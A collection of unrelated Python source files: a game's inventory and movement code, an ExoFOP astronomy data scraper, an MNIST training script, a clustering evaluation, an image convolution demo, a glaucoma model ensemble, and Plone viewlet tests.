arcade.draw_texture_rectangle(width_sum + (x * WIDTH), ((y - line_pos) * HEIGHT), WIDTH, HEIGHT, font[ord(char)])
def gen_inv(self):
for icon in range(4):
self.gen_lone_tile(icon+1821, (2.5 + icon * 2, 8)) # icons for menu tabs
if self.inventory_screen == 0:
for cur_item in range(len(self.p.inventory[self.cur_opt[1]:self.cur_opt[1] + 6 or -1])):
self.gen_lone_tile(self.p.inventory[cur_item + self.cur_opt[1]].sprite, yx=(2, 6.5 - cur_item))
if not self.opt_highlighted:
self.gen_text(opts=[' {}'.format(cur_item) for cur_item in self.p.name_list(self.p.inventory)], yx=(6.5, 1.5), len_display=6)
else:
self.gen_text(text=[' {}'.format(cur_item) for cur_item in self.p.name_list(self.p.inventory)], yx=(6.5, 1.5), len_display=6)
self.gen_sub_menu() # this is disgusting
elif self.inventory_screen == 1:
for item_pos, cur_item in enumerate(list(self.p.equipped.keys())):
if self.p.equipped[cur_item] is not None:
self.gen_lone_tile(self.p.equipped[cur_item].sprite, yx=(2 + item_pos // 5, 6 - item_pos % 5))
if not self.opt_highlighted:
self.gen_lone_tile(1906, yx=(2 + self.cur_opt[0] // 5, 6 - self.cur_opt[0] % 5))
if self.p.equipped[list(self.p.equipped.keys())[self.cur_opt[0]]] is not None:
self.gen_text(text=[self.p.equipped[list(self.p.equipped.keys())[self.cur_opt[0]]].name], yx=(6.5, 5.5))
else:
self.gen_text(text=self.p.equipped[list(self.p.equipped.keys())[self.cur_opt[0]]].actions, yx=(6.5, 1.5), len_display=6)
self.gen_sub_menu()
elif self.inventory_screen == 2:
self.gen_text(text=self.p.get_stats(), yx=(6.5, 1), len_display=6)
elif self.inventory_screen == 3:
self.gen_text(opts=options_menu, yx=(6.5, 2))
def gen_sub_menu(self):
'''for cur_pos, cur_tile in enumerate(f_maps['submenu']):
self.gen_lone_tile(cur_tile, (10 + cur_pos % 4, 2.5 + cur_pos // 4))'''
for x, row in enumerate(array_map['submenu']):
for y, col in enumerate(row):
self.gen_tile_array(array_map['submenu'], (x, y), yx=(10, 2.5))
self.gen_text(opts=self.cur_item.get_actions(), yx=(6, 11))
@staticmethod
def gen_tile_array(in_array, r_c, yx=(0, 0)):
row, col = r_c
y, x = yx
arcade.draw_texture_rectangle(HEIGHT * (y + col), WIDTH * (x + row), WIDTH, HEIGHT, tile_set[in_array[r_c]])
@staticmethod
def gen_lone_tile(in_tile, yx, base_img=None):
if not base_img:
base_img = tile_set
y, x = yx
arcade.draw_texture_rectangle(HEIGHT * y, WIDTH * x, WIDTH, HEIGHT, base_img[in_tile])
def on_key_press(self, key, modifiers):
if self.p.state is 'Inventory':
if key in movement_keys['NW'] and self.inventory_screen > 0:
self.cur_opt = [0, 0]
self.inventory_screen -= 1
if key in movement_keys['NE'] and self.inventory_screen < 3:
self.cur_opt = [0, 0]
self.inventory_screen += 1
if key in movement_keys['Inv']:
if self.opt_highlighted:
self.opt_highlighted = False
else:
self.switch_state('Walking')
if self.inventory_screen == 0:
if key in movement_keys['S']:
if self.opt_highlighted:
self.cur_opt[0] += 1
else:
if self.cur_opt[0] < 5:
self.cur_opt[0] += 1
elif sum(self.cur_opt) + 1 < len(self.p.inventory):
self.cur_opt[1] += 1
if key in movement_keys['N']:
if self.cur_opt[0] > 0:
self.cur_opt[0] -= 1
elif self.cur_opt[1] > 0:
self.cur_opt[1] -= 1
if key in movement_keys['Context']:
if self.opt_highlighted:
self.interact_item(self.cur_item, self.cur_item.actions[self.cur_opt[0]])
self.opt_highlighted = False
else:
self.cur_item = self.p.inventory[sum(self.cur_opt)]
self.opt_highlighted = True
if self.inventory_screen == 1:
if key in movement_keys['S'] and self.cur_opt[0] < 14:
self.cur_opt[0] += 1
if key in movement_keys['N'] and self.cur_opt[0] > 0:
self.cur_opt[0] -= 1
if key in movement_keys['E'] and self.cur_opt[0] < 10:
self.cur_opt[0] += 5
if key in movement_keys['W'] and self.cur_opt[0] > 4:
self.cur_opt[0] -= 5
if key in movement_keys['Context']:
if self.opt_highlighted:
self.interact_item(self.cur_item, self.cur_item.actions[self.cur_opt[0]])
self.opt_highlighted = False
else:
self.cur_item = self.p.equipped[list(self.p.equipped.keys())[self.cur_opt[0]]].name
self.opt_highlighted = True
if self.inventory_screen == 2:
pass
if self.inventory_screen == 3:
if key in movement_keys['Context']:
if 'Settings' in options_menu[self.cur_opt[0]]:
Game.close(self)
if 'Gameplay' in options_menu[self.cur_opt[0]]:
Game.close(self)
if 'Exit' in options_menu[self.cur_opt[0]]:
Game.close(self)
if key in movement_keys['S'] and self.cur_opt[0] < 3:
self.cur_opt[0] += 1
if key in movement_keys['N'] and self.cur_opt[0] > 0:
self.cur_opt[0] -= 1
elif self.p.state is 'Walking':
if key in movement_keys['Inv']:
self.switch_state('Inventory')
if key in movement_keys['Context']:
if type(array_map[current_map]['Sprite'][self.p.y + 1, self.p.x]) is DialogItem:
self.cur_text = array_map[current_map]['Sprite'][self.p.y + 1, self.p.x]
self.switch_state('Talking')
elif self.p.state is 'Talking':
if key in movement_keys['N']:
if self.cur_opt[0] > 0:
self.cur_opt[0] -= 1
elif self.cur_opt[1] > 0:
self.cur_opt[1] -= 1
if key in movement_keys['S']:
if self.cur_opt[0] < 2:
self.cur_opt[0] += 1
elif sum(self.cur_opt) < len(self.cur_text.dialog_opts) - 1:
self.cur_opt[1] += 1
if key in movement_keys['Context']:
if self.cur_text.dialog_opts:
array_map[current_map]['Sprite'][self.p.y + 1, self.p.x] = self.cur_text.dialog_opts[list(self.cur_text.dialog_opts)[sum(self.cur_opt)]]
self.whatsnextifier(choice=self.cur_text.dialog_opts[list(self.cur_text.dialog_opts)[sum(self.cur_opt)]])
self.switch_state('Talking')
print(array_map[current_map]['Sprite'][self.p.y + 1, self.p.x])
elif len(self.cur_text.text) > 3:
if len(self.cur_text.text) - 2 > self.cur_opt[1]:
self.cur_opt[1] += 1
else:
self.switch_state('Walking')
if key in movement_keys['Exit']:
if self.p.state is 'Inventory' and self.opt_highlighted:
self.opt_highlighted = False
elif self.p.state is not 'Walking':
self.switch_state('Walking')
else:
self.switch_state('Inventory')
self.inventory_screen = 3
def on_mouse_press(self, x: float, y: float, dx: float, dy: float):
print(x, y)
def update(self, delta_time: float):
start_time = timeit.default_timer()
if self.p.state is 'Walking' and self.pressed_keys:
self.cur_time = time.process_time()
if self.cur_time - self.last_input_time > 0.05:
if any(key in movement_keys['N'] for key in self.pressed_keys):
# if array_map[current_map][0][self.p.y + 1, self.p.x] == 0:
self.p.y += 1
self.game_step()
if any(key in movement_keys['S'] for key in self.pressed_keys):
# if array_map[current_map][0][self.p.y - 1, self.p.x] == 0:
self.p.y -= 1
self.game_step()
if any(key in movement_keys['E'] for key in self.pressed_keys):
# if array_map[current_map][0][self.p.y, self.p.x + 1] == 0:
self.p.x += 1
self.game_step()
if any(key in movement_keys['W'] for key in self.pressed_keys):
# if array_map[current_map][0][self.p.y, self.p.x - 1] == 0:
self.p.x -= 1
self.game_step()
if any(key in movement_keys['NE'] for key in self.pressed_keys):
if array_map[current_map][0][self.p.y + 1, self.p.x + 1] == 0:
self.p.x += 1
self.p.y += 1
self.game_step()
if any(key in movement_keys['NW'] for key in self.pressed_keys):
if array_map[current_map][0][self.p.y - 1, self.p.x + 1] == 0:
self.p.x -= 1
self.p.y += 1
self.game_step()
if any(key in movement_keys['SE'] for key in self.pressed_keys):
if array_map[current_map][0][self.p.y + 1, self.p.x - 1] == 0:
self.p.x += 1
self.p.y -= 1
self.game_step()
if any(key in movement_keys['SW'] for key in self.pressed_keys):
if array_map[current_map][0][self.p.y - 1, self.p.x - 1] == 0:
self.p.x -= 1
self.p.y -= 1
self.game_step()
self.last_input_time = self.cur_time
self.processing_time = timeit.default_timer() - start_time
def interact_item(self, item, action):
if action is 'Equip':
if item in self.p.inventory:
self.p.inventory.remove(item)
for possible_pos in item.body_position:
if self.p.equipped[possible_pos] is None:
self.p.equipped[possible_pos] = item
else: # the item is equipped
self.p.inventory.append(item)
if action is 'Look':
self.cur_text = item.look()
self.switch_state('Talking')
if action is 'Drop':
self.p.inventory.remove(item)
def whatsnextifier(self, choice):
array_map[current_map]['Sprite'][self.p.y+1, self.p.x] = choice
self.cur_text = array_map[current_map]['Sprite'][self.p.y + 1, self.p.x]
def game_step(self):
self.add_sprites()
cur_health = [item for sublist in [[1745] * (self.p.stats['HP'] // 2), [1746] * (self.p.stats['HP'] % 2 == 1)] for item in sublist]
actor_list = [cur_act for cur_act in self.actor_list if hasattr(cur_act, 'disposition')]
enemy_list = [enemy for enemy in actor_list if enemy.disposition is 'Aggressive']
for actor in actor_list:
if actor.disposition is 'Friendly':
if enemy_list:
actor.move_me((enemy_list[0].y, enemy_list[0].x))
else:
actor.move_me((self.p.y, self.p.x))
elif actor.disposition is 'Aggressive':
actor.move_me((self.p.y, self.p.x))
def main():
Game(*sc)
arcade.run()
if __name__ == '__main__':
main()
|
18,758 | 4d671e45c6541d17b178dd7dc21bc857b005f62c | # coding: utf-8
import sys
try:
# python 3
from urllib.request import urlopen, urlretrieve
except ImportError:
# Python 2
from urllib import urlretrieve
from urllib2 import urlopen
from bs4 import BeautifulSoup
from tqdm import tqdm
import os
def get_phot(epic, verbose=False, savefp=None, return_str=False):
PM = '±'
url = 'https://exofop.ipac.caltech.edu/k2/edit_target.php?id={}'.format(epic)
soup = BeautifulSoup(urlopen(url).read(), "html5lib")
table = soup.find(id='myTable1')
res = {}
out_str = ''
for line in table.findAll('tr')[2:]:
td = line.findAll('td')
band = td[0].text
if band == 'Kep':
band = 'Kepler'
elif band == 'WISE 3.4 micron':
band = 'W1'
elif band == 'WISE 4.6 micron':
band = 'W2'
elif band == 'WISE 12 micron':
band = 'W3'
elif band == 'WISE 22 micron':
band = 'W4'
vals = td[1].text
if PM in vals:
line_str = ' '.join([band, '=', ','.join(vals.split(PM))])
res[band] = list(map(float, vals.split(PM)))
else:
line_str = ' '.join([band, '=', vals])
res[band] = float(vals)
out_str += line_str+'\n'
if savefp:
with open(savefp, 'w') as f:
f.write(out_str)
if verbose:
print(out_str)
if return_str:
return out_str
return res
def get_stellar(epic, verbose=False, rstar=True, savefp=None, return_str=False):
"""
defaults to Huber et al. if multiple rows exist
"""
PM = '±'
url = 'https://exofop.ipac.caltech.edu/k2/edit_target.php?id={}'.format(epic)
soup = BeautifulSoup(urlopen(url).read(), "html5lib")
table = soup.find(id='myTable2')
line = table.findAll('tr')[1]
keys = [th.text for th in line.findAll('th')]
for line in table.findAll('tr')[2:]:
if 'Huber' in line.findAll('td')[-3].text:
break
vals = [th.text for th in line.findAll('td')]
want = 'Teff(K) log(g) [Fe/H]'.split()
good = 'Teff logg feh'.split()
if rstar:
want.append('Radius(R_Sun)')
good.append('rstar')
out_str = ''
for g,w in zip(good, want):
idx = keys.index(w)
line_str = ' '.join([g, '=', ','.join(vals[idx].split(PM))])
out_str += line_str+'\n'
if savefp:
with open(savefp, 'w') as f:
f.write(out_str)
if verbose:
print(out_str)
if return_str:
return out_str
res = {k:list(map(float, vals[keys.index(w)].split(PM))) \
for k,w in zip(good, want)}
return res
def get_planets(epic):
"""
epic : EPIC ID
returns: cand, t0, per, d_mmag, d_ppm, tdur, rp
"""
PM = '±'
url = 'https://exofop.ipac.caltech.edu/k2/edit_target.php?id={}'.format(epic)
soup = BeautifulSoup(urlopen(url).read(), "html5lib")
table = soup.find(id='myTable3')
planets = {}
for tab in table.findAll('tr')[2:]:
res = [td.text.strip() for td in tab.findAll('td')[:7]]
cand = res[0]
keys = 't0, per, d_mmag, d_ppm, tdur, rp'.split(', ')
d = {}
for k,v in zip(keys,res[1:]):
if v is not '':
if PM not in v:
d[k] = float(v)
else:
# d[k] = list(map(float, v.split(PM)))
mu, sig = map(float, v.split(PM))
d[k] = mu
d[k+'_err'] = sig
else:
d[k] = None
planets[cand] = d
return planets
def get_all_links(epic,mission='k2'):
baseurl = "https://exofop.ipac.caltech.edu/"
webpage = baseurl+mission+"/edit_target.php?id={}".format(epic)
try:
html_page = urlopen(webpage)
html = urlopen(webpage)
bsObj = BeautifulSoup(html.read(), "lxml");
except Exception as e:
print('Error: {}\n{} does not exist!\n'.format(e,webpage))
sys.exit()
links = []
for link in bsObj.find_all('a'):
links.append(link.get('href'))
if len(links) == 0:
print('No links fetched. Check EPIC number.\n')
sys.exit()
return links
def get_specific_ext(links,ext='csv',mission='k2'):
baseurl = "https://exofop.ipac.caltech.edu/"
wanted = []
for link in links:
try:
if link.split('.')[-1] == ext:
wanted.append(baseurl+mission+'/'+link)
except:
pass
if len(wanted) == 0:
print('No links fetched with file extension={}\n'.format(ext))
sys.exit()
return wanted
def save_to_file(epic, urls, ext):
epic = str(epic)
if not os.path.exists(epic):
os.makedirs(epic)
subfolder = os.path.join(epic,ext)
if not os.path.exists(subfolder):
os.makedirs(subfolder)
print('\n----------Saving .{} files----------\n'.format(ext))
i =0
for url in tqdm(urls):
#save: e.g. epic/epic.csv
# if len(urls) > 1:
# fname = epic+'_'+str(i)+'.'+ext
# else:
# fname = epic+'.'+ext
fname = url.split('/')[-1]
destination = os.path.join(subfolder,fname)
try:
urlretrieve(url, destination)
#print('Saved: {}\n'.format(url))
except Exception as e:
print('Error: {}\nNot saved: {}\n'.format(e,url))
i+=1
return None
|
18,759 | d90915206b80cc664c6a7aa3c48aadea71282624 | '''
Desc1:这是一个用tensorflow张量的方式实现深度网络前向传播的代码
Desc2:激活函数调用activation激活函数类中的激活函数方法
Author:SQY
DateTime:2020-7-15
'''
import tensorflow as tf
import numpy as np
from tensorflow.keras import datasets
import os
from activation import Activate
#类的实例化
act = Activate()
# 去除打印无关信息
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
# 下载数据
(x_train, y_train), (x_test, y_test) = datasets.mnist.load_data()
# 将数据格式进行转变为张量,并且将x的范围归一到0-1范围
x_train = tf.convert_to_tensor(x_train, dtype=tf.float32) / 255
y_train = tf.convert_to_tensor(y_train, dtype=tf.int32)
#测试数据集划分
x_test = tf.convert_to_tensor(x_test,dtype=tf.float32)/255
y_test = tf.convert_to_tensor(y_test,dtype=tf.int32)
# print("x_train:", x_train.shape, x_train.dtype)
# print("y_train:", y_train.shape, y_train.dtype)
# minist数据集是【6000,28,28】,现在对minist第一个维度切分,并且每次取128
x_train_db = tf.data.Dataset.from_tensor_slices((x_train, y_train)).batch(128)
test_db = tf.data.Dataset.from_tensor_slices((x_test,y_test)).batch(128)
# # 不断迭代
# x_train_iter = iter(x_train_db)
# # 返回迭代的数据
# sample = next(x_train_iter)
# print("size:", sample[0].shape, sample[1].shape)
# 定义w,b,其中w[input_dims,output_dims],b[output_dims]
# w[784,256]-->[256,128]-->[128,10]
# b初始化为0
w1 = tf.Variable( tf.random.truncated_normal([784, 256],stddev = 0.1))
b1 = tf.Variable(tf.zeros([256]))
w2 = tf.Variable(tf.random.truncated_normal([256, 128],stddev = 0.1 ))
b2 = tf.Variable(tf.zeros([128]))
w3 = tf.Variable(tf.random.truncated_normal([128, 10],stddev = 0.1))
b3 = tf.Variable(tf.zeros([10]))
# 求h = w @ x +b:w@x矩阵乘法
lr = 1e-3
for epoch in range(10):#针对每个数据集迭代10次
for step,(x_train, y_train) in enumerate(x_train_db):#针对每轮128个数据迭代求权重,偏移,求导
# 改变x的维度(-1,28*28)
x_train = tf.reshape(x_train, [-1, 28 * 28])
#梯度求导,主要对w1b1w2b2w3b3
with tf.GradientTape() as tape:
h1 = tf.matmul(x_train, w1) + b1
act.Relu(h1)
h2 = tf.matmul(h1, w2) + b2
act.Relu(h2)
output = tf.matmul(h2, w3) + b3
# 计算均方差损失函数
# 将y转化为向量one_hot向量
y_train = tf.one_hot(y_train, 10)
loss = tf.square(y_train - output)
loss = tf.reduce_mean(loss)
grads = tape.gradient(loss,[w1,b1,w2,b2,w3,b3])
# 根据上面的梯度求导来更新w,b的值
#w1 = w1 - lr * w1_grads
# w1 = w1 - lr * grads[0]
# b1 = b1 - lr * grads[1]
# w2 = w2 - lr * grads[2]
# b2 = b2 - lr * grads[3]
# w3 = w3 - lr * grads[4]
# b3 = b3 - lr * grads[5]
w1.assign_sub(lr * grads[0])
b1.assign_sub(lr * grads[1] )
w2.assign_sub(lr * grads[2])
b2.assign_sub(lr * grads[3])
w3.assign_sub(lr * grads[4])
b3.assign_sub(lr * grads[5])
if step %100 == 0:
print("loss:",float(loss),"step:",step)
print("epoch:",epoch)
#初始化正确的数量,初始化总的测试样本的数量
total_correct = 0
total_num = 0
#用测试数据计算准确率
for step,(x_test,y_test) in enumerate(test_db):
x_test = tf.reshape(x_test,[-1,28*28])
h1 = tf.nn.relu(tf.matmul(x_test,w1) + b1)
h2 = tf.nn.relu(tf.matmul(h1,w2) + b2)
output = tf.matmul(h2,w3) + b3
#用softmax函数求出输出的概率
prob = tf.nn.softmax(output,axis=1)
#求出输出概率最大值的索引
pred = tf.argmax(prob,axis=1)
#pred为int64,需要人为转化为int32
pred = tf.cast(pred,dtype=tf.int32)
#计算准确率
#将预测值与真实值进行比较,并转化为int32类型转(0-1)
correct = tf.cast(tf.equal(pred,y_test),dtype=tf.int32)
#统计预测对的个数
correct = tf.reduce_sum(correct)
#correct是一个tensor,需要转化为int类型
total_correct += int(correct)
total_num += x_test.shape[0]
#计算accuracy,total_correct / total_num
acc = total_correct / total_num
print("acc:",float(acc))
# 输出x,y最大值最小值
# print("x_max:",tf.reduce_max(x_train))
# print("x_min:",tf.reduce_min(x_train))
# print("y_max:",tf.reduce_max(y_test))
|
18,760 | a6a36ae07d9c1dc8e698c7c5fed82e7f373ee99a | from __future__ import division
from random import shuffle
import random
import pandas
def get_cluster_truth(clusters_truth_file):
cluster_truth = {}
line = clusters_truth_file.readline().strip()
i = 0
while line:
patients = line.split(" ")
for patient in patients:
cluster_truth[patient]=i
i += 1
line = clusters_truth_file.readline().strip()
return cluster_truth
def get_cluster_count(cluster_set,cluster_truth):
cluster_counts = []
for cluster in cluster_set:
cluster_count = {}
for patient in cluster:
cluster = cluster_truth[patient]
if cluster in cluster_count.keys():
cluster_count[cluster] += 1
else:
cluster_count[cluster] = 1
cluster_counts.append(cluster_count)
return cluster_counts
def combination(number):
if number > 1:
return number*(number-1)/2
else:
return 0
def claculate_TPTN(cluster_numbers):
TP = 0
TN = 0
FP = 0
total = 0
for i in range(len(cluster_numbers)):
total_local = 0
for cluster in cluster_numbers[i].keys():
total += cluster_numbers[i][cluster]
total_local += cluster_numbers[i][cluster]
TP += combination(cluster_numbers[i][cluster])
tn = 0
for j in range(len(cluster_numbers)):
if i != j:
for c in cluster_numbers[j].keys():
if c != cluster:
tn += cluster_numbers[j][c]
TN += cluster_numbers[i][cluster]*tn
FP += combination(total_local)
return TP,TN,FP,total
def check_convergence(resi_index,patient_cluster,patient,global_patient_set,resi_distance_matrix):
removed = []
for patient_i in patient_cluster:
if patient_i != patient:
i = resi_index.index(patient_i)
minimun = min(resi_distance_matrix[i])
smallest = resi_distance_matrix[i].index(minimun)
s = resi_index[smallest]
if s not in patient_cluster:
removed.append(patient_i)
for patient in removed:
patient_cluster.remove(patient)
global_patient_set.remove(patient)
# print str(patient) + " removed"
def load_diatance_matrix(distance_file_route):
resi_distance_matrix_file = file(distance_file_route)
line = resi_distance_matrix_file.readline().strip()
resi_index = line.split("\t")[1:]
size = len(resi_index)
resi_distance_matrix = []
line = resi_distance_matrix_file.readline().strip()
while line:
distance = []
distances = line.split("\t")[1:]
for dis in distances:
distance.append(int(dis))
resi_distance_matrix.append(distance)
line = resi_distance_matrix_file.readline().strip()
resi_distance_matrix_file.close()
return resi_distance_matrix,size, resi_index
def clustering(resi_distance_matrix, size, resi_index,distance_threshold,P,R,F,cluster_truth,clusters_result_file):
seed = random.randint(1,200)
random.seed = seed
cluster_set = []
global_patient_set = set()
order = [i for i in range(size)]
shuffle(order)
for i in order:
patient = resi_index[i]
cluster = set()
if patient not in global_patient_set:
cluster.add(patient)
global_patient_set.add(patient)
for j in range(0, size):
distance = int(resi_distance_matrix[i][j])
if distance < distance_threshold and resi_index[j] not in global_patient_set:
cluster.add(resi_index[j])
global_patient_set.add(resi_index[j])
if len(cluster) > 1:
check_convergence(resi_index, cluster, patient, global_patient_set, resi_distance_matrix)
if len(cluster) > 0:
cluster_set.append(cluster)
cluster_numbers = get_cluster_count(cluster_set, cluster_truth)
for cluster in cluster_set:
line = ""
for patient in cluster:
line += str(patient) + " "
line += "\n"
clusters_result_file.writelines(line)
# cluster_numbers = []
# cluster1 = {}
# cluster1[1] = 5
# cluster1[2] = 1
# cluster_numbers.append(cluster1)
#
# cluster1 = {}
# cluster1[1] = 1
# cluster1[2] = 4
# cluster1[3] = 1
# cluster_numbers.append(cluster1)
#
# cluster1 = {}
# cluster1[1] = 2
# cluster1[3] = 3
# cluster_numbers.append(cluster1)
TP, TN, FP_TP, total = claculate_TPTN(cluster_numbers)
TN /= 2
FN = combination(total) - FP_TP - TN
# print "TP:" + str(TP)
# print "TN:" + str(TN)
# print "FP_TP:" + str(FP_TP)
# print "FN:" + str(FN)
# print total
# RI = (TP+TN)/combination(total)
p = TP / FP_TP
r = TP / (TP + FN)
f = 2 * p * r / (p + r)
# print RI
P.append(p)
R.append(r)
F.append(f)
for isresi in ["resi","unresi"]:
resi_distance_matrix, size, resi_index = load_diatance_matrix("./output_new/distance_"+isresi+".txt")
clusters_result_statistics_file = file("./output_new/cluster_"+isresi+"_statistcs.txt", "w")
clusters_truth_file = file("./output_new/0.26_100_0.01_0.018_0.05_0.75_"+isresi+".txt")
cluster_truth = get_cluster_truth(clusters_truth_file)
clusters_result_file = file("./output_new/cluster_"+isresi+".txt", "w")
if isresi == "resi":
distance_threshold = [10, 30, 50, 70]
else:
distance_threshold = [30, 60, 90, 120]
for threshold in distance_threshold:
P = []
R = []
F = []
for i in range(50):
clustering(resi_distance_matrix, size, resi_index, threshold, P, R, F,cluster_truth,clusters_result_file)
clusters_result_statistics_file.writelines("Distance_Threshlod:" + str(threshold) + "\n\n")
line = " ".join(str(e) for e in P)
clusters_result_statistics_file.writelines("precision: " + line + "\n")
P_pd = pandas.Series(P)
clusters_result_statistics_file.writelines("precision mean: " + str(P_pd.mean()) + "\n")
clusters_result_statistics_file.writelines("precision std: " + str(P_pd.std()) + "\n\n")
line = " ".join(str(e) for e in R)
clusters_result_statistics_file.writelines("recall: " + line + "\n")
R_pd = pandas.Series(R)
clusters_result_statistics_file.writelines("recall mean: " + str(R_pd.mean()) + "\n")
clusters_result_statistics_file.writelines("recall std: " + str(R_pd.std()) + "\n\n")
line = " ".join(str(e) for e in F)
clusters_result_statistics_file.writelines("F1: " + line + "\n")
F_pd = pandas.Series(F)
clusters_result_statistics_file.writelines("F1 mean: " + str(F_pd.mean()) + "\n")
clusters_result_statistics_file.writelines("F1 std: " + str(F_pd.std()) + "\n\n")
clusters_truth_file.close()
clusters_result_file.close()
clusters_result_statistics_file.close() |
18,761 | 4e3e3ae7a3b436c5b24e6919504bd8f31bac39c9 | import numpy as np
import matplotlib.pyplot as plt
def conv2d(picture, filter):
convPicture = np.zeros(picture.shape)
m = int(len(filter)/2)
for i in range(m, len(picture) - m):
for j in range(m, len(picture[0]) - m):
mat = picture[i-m:i+m+1, j-m:j+m+1]
convPicture[i, j] = np.sum(mat * filter)
return convPicture
if __name__ == '__main__':
filterA = np.array([[1, 2, 1], [2, 4, 2], [1, 2, 1]]) / 16
filterB = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])
filterC = np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]])
pic = plt.imread('cameraman.png')
org = np.array(pic)
fA = conv2d(org, filterA)
fB = conv2d(org, filterB)
fC = conv2d(org, filterC)
plt.subplot(2, 2, 1)
plt.imshow(org, 'gray')
plt.title('Original')
plt.subplot(2, 2, 2)
plt.imshow(fA, 'gray')
plt.title('Filter A')
plt.subplot(2, 2, 3)
plt.imshow(fB, 'gray')
plt.title('Filter B')
plt.subplot(2, 2, 4)
plt.imshow(fC, 'gray')
plt.title('Filter C')
plt.show() |
18,762 | 98980a00b8e976c7c027a4d14ae42f905f50841b | import pandas as pd
import numpy as np
import os
from scipy import stats
from sklearn.metrics import roc_auc_score,classification_report
import itertools
out_csv = '/media/htic/Balamurali/Glaucoma_models/classification_results.csv'
src_path = '/media/htic/Balamurali/Glaucoma_models/'
test_data_len = 400
color_space = ['LAB','Normalized','PseudoDepth']
models = ['resnet152']#,'densenet201','resnet101','densenet169']
score_np = np.empty([test_data_len,0])
pred_np = np.empty([test_data_len,0])
# Change for test
is_test = False
csv_name = 'output.csv'
for model in models:
for color in color_space:
csv_path = os.path.join(src_path,'{}_{}'.format(model,color),csv_name)
pd_data = pd.read_csv(csv_path)
file_names = pd_data['FileName'].values.reshape(400,1)
pred_data = pd_data['Predicted'].values.reshape(400,1)
score_data = pd_data['Glaucoma Risk'].values.reshape(400,1)
pred_np = np.hstack([pred_np,pred_data])
score_np = np.hstack([score_np,score_data])
# break
# break
#print (file_names)
best_predict,_ = stats.mode(pred_np,axis=1)
best_predict = best_predict.astype(np.uint8)
score_np_min = np.min(score_np,axis=1).reshape(400,1)
score_np_max = np.max(score_np,axis=1).reshape(400,1)
zero_mask = np.where(best_predict == 0)
one_mask = np.where(best_predict == 1)
print(zero_mask[0].shape)
result_score = np.zeros([400,1])
result_score[zero_mask] = score_np_max[zero_mask]
result_score[one_mask] = score_np_min[one_mask]
# print (result_score)
if is_test:
gt = np.zeros((400,1))
gt[:40] = 1
# print(gt)
print(roc_auc_score(gt,result_score))
result = np.hstack([file_names,result_score])
df = pd.DataFrame(result)
df.to_csv(out_csv,header=['FileName','Glaucoma Risk'],index=False)
|
18,763 | 292833ef780249af66a72c804e86e2d6bded3539 | # -*- coding: utf-8 -*-
"""Test views."""
from collective.messagesviewlet.message import PseudoMessage
from imio.dms.mail.browser.viewlets import ContactContentBackrefsViewlet
from imio.dms.mail.browser.viewlets import ContextInformationViewlet
from imio.dms.mail.dmsmail import IImioDmsIncomingMail
from imio.dms.mail.testing import DMSMAIL_INTEGRATION_TESTING
from imio.helpers.content import get_object
from plone import api
from plone.app.testing import login
import unittest
class TestContactContentBackrefsViewlet(unittest.TestCase):
layer = DMSMAIL_INTEGRATION_TESTING
def setUp(self):
self.portal = self.layer['portal']
self.ctct = self.portal['contacts']
self.elec = self.ctct['electrabel']
self.jean = self.ctct['jeancourant']
self.imf = self.portal['incoming-mail']
self.omf = self.portal['outgoing-mail']
def test_backrefs(self):
viewlet = ContactContentBackrefsViewlet(self.elec, self.elec.REQUEST, None)
# configure to see all refs
api.portal.set_registry_record('imio.dms.mail.browser.settings.IImioDmsMailConfig.all_backrefs_view', True)
self.assertListEqual([self.portal.unrestrictedTraverse(b.getPath()) for b in viewlet.backrefs()],
[get_object(oid='reponse7', ptype='dmsoutgoingmail'),
get_object(oid='reponse1', ptype='dmsoutgoingmail'),
get_object(oid='courrier7', ptype='dmsincomingmail'),
get_object(oid='courrier1', ptype='dmsincomingmail')])
# configure to see only permitted refs
api.portal.set_registry_record('imio.dms.mail.browser.settings.IImioDmsMailConfig.all_backrefs_view', False)
self.assertListEqual(viewlet.backrefs(), [])
# login to get view permission
login(self.portal, 'encodeur')
self.assertListEqual([b.getObject() for b in viewlet.backrefs()],
[get_object(oid='courrier7', ptype='dmsincomingmail'),
get_object(oid='courrier1', ptype='dmsincomingmail')])
def test_find_relations(self):
login(self.portal, 'encodeur')
viewlet = ContactContentBackrefsViewlet(self.elec, self.elec.REQUEST, None)
ret = viewlet.find_relations(from_attribute='sender')
self.assertSetEqual(set([b.getObject() for b in ret]), {get_object(oid='courrier7', ptype='dmsincomingmail'),
get_object(oid='courrier1', ptype='dmsincomingmail')})
ret = viewlet.find_relations(from_interfaces_flattened=IImioDmsIncomingMail)
self.assertSetEqual(set([b.getObject() for b in ret]), {get_object(oid='courrier7', ptype='dmsincomingmail'),
get_object(oid='courrier1', ptype='dmsincomingmail')})
# call on person
viewlet = ContactContentBackrefsViewlet(self.jean, self.jean.REQUEST, None)
ret = viewlet.find_relations()
self.assertSetEqual(set([b.getObject() for b in ret]), {get_object(oid='courrier3', ptype='dmsincomingmail'),
get_object(oid='courrier9', ptype='dmsincomingmail')})
# call on held position
agent = self.jean['agent-electrabel']
viewlet = ContactContentBackrefsViewlet(agent, agent.REQUEST, None)
ret = viewlet.find_relations()
self.assertSetEqual(set([b.getObject() for b in ret]), {get_object(oid='courrier5', ptype='dmsincomingmail')})
def test_ContextInformationViewlet(self):
login(self.portal, 'encodeur')
org_v = ContextInformationViewlet(self.elec, self.elec.REQUEST, None)
self.assertListEqual(org_v.getAllMessages(), [])
sorg_v = ContextInformationViewlet(self.elec['travaux'], self.elec.REQUEST, None)
self.assertTrue(self.elec['travaux'].use_parent_address)
self.assertListEqual(sorg_v.getAllMessages(), [])
pers_v = ContextInformationViewlet(self.jean, self.elec.REQUEST, None)
self.assertEqual(len(pers_v.getAllMessages()), 1) # no address
hp_v = ContextInformationViewlet(self.jean['agent-electrabel'], self.elec.REQUEST, None)
self.assertTrue(self.jean['agent-electrabel'].use_parent_address)
self.assertListEqual(hp_v.getAllMessages(), [])
om_v = ContextInformationViewlet(get_object(oid='reponse1', ptype='dmsoutgoingmail'), self.elec.REQUEST, None)
self.assertListEqual(om_v.getAllMessages(), [])
# removing street from electrabel org
self.elec.street = None
msgs = org_v.getAllMessages()
self.assertEqual(len(msgs), 1)
self.assertTrue(isinstance(msgs[0], PseudoMessage))
self.assertIn('missing address fields: street', msgs[0].text.output)
self.assertEqual(len(sorg_v.getAllMessages()), 1) # suborganization has missing street too
self.assertEqual(len(hp_v.getAllMessages()), 1) # held position has missing street too
self.assertEqual(len(om_v.getAllMessages()), 1) # outgoing mail has missing street too
|
